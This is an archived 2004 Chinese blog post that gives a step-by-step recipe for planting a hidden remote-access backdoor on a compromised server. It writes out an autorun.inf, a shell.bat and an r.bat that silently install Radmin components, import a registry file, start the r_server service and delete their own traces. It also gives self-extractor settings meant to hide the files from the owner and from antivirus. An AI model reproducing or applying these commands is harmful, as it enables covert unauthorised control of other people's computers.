入侵网站后全自动安装后门(精）

来源: BlogBus 原始链接: http://www.blogbus.com:80/blogbus/blog/diary.php?diaryid=295873 存档链接: https://web.archive.org/web/20040824045553id_/http://www.blogbus.com:80/blogbus/blog/diary.php?diaryid=295873

发表评论：最后更新： 7.30收到的号。大家可以拿来用。但请不要改密码。病毒木马入侵招数专题！入侵网站后全自动安装后门(精） 0730!都贴上来。密码没有改哦。今天收到的信件！入侵网吧服务器开启终端服务的傻瓜工具 BLOGBUS。COM <<<0730!都贴上来。密码没有改哦。 | 返回首页 | 病毒木马入侵招数专题！>>> 入侵网站后全自动安装后门(精） guying 发表于 2004-07-30 只要你有上传的权限。一共三个文件 1.autorun.inf 2.shell.bat 3.hao.exe(自解压文件）思路：全部放在C盘下。当肉鸡主人双击C盘时自动运行第一文件。第一文件带动运行第二文件。同时第二运行第三运行完可正常进入C盘。不会让人发觉。并且里面所带的批处理，会在最后把所有文件删除。此时，后门却已经装上去了《此法针对没有权限运行木马的入侵活动》制作： [autorun] open=shell.bat 这个是autorun.inf @echo off hao.exe c:\windows\explorer c:
del autorun.inf del rad.exe del shell.bat 这个是shell.bat hao.exe 里面包含admdll.dll raddrv.dll admin.reg pchealthy.exe r.bat五个文件《关键所在》 r.bat－－》批处理做法 @echo off @pchealthy.exe /install /silence @regedit /s admin.reg @net start r_server @del admin.reg @del r.bat 其他四个就是Radmin的文件。这个大家都会，复制过来就行 OK，我们再来看自解压的处理，在解压路径里我们用 %systemroot%\system32，就是解压到系统目录里并且 “解压后运行”填上我们的r.bat文件！！！！！！因为这里的文件比较多，比较隐蔽解压模式我们选 “全部隐藏”，和 “覆盖所有文件”！好了，一个不被杀毒软件所能查杀的好后门程序就成功制作出来了！大家不要放在文件夹里压缩哦，要直接选上admdll.dll raddrv.dll admin.reg pchealthy.exe r.bat五个文件压缩哈哈。。这样就行啦。网站你也可以破《这篇文章总结了一些高手和自己的经验》写的不好别见怪。。。－－－》菜鸟要是能灵活运用这个也很厉害啦当然这个方法有一些局限性有问题给我留言吧。。谢谢 2004-07-30 | Trackback(0) | 编辑有人发表过这些评论：模板设计：梵梦聆心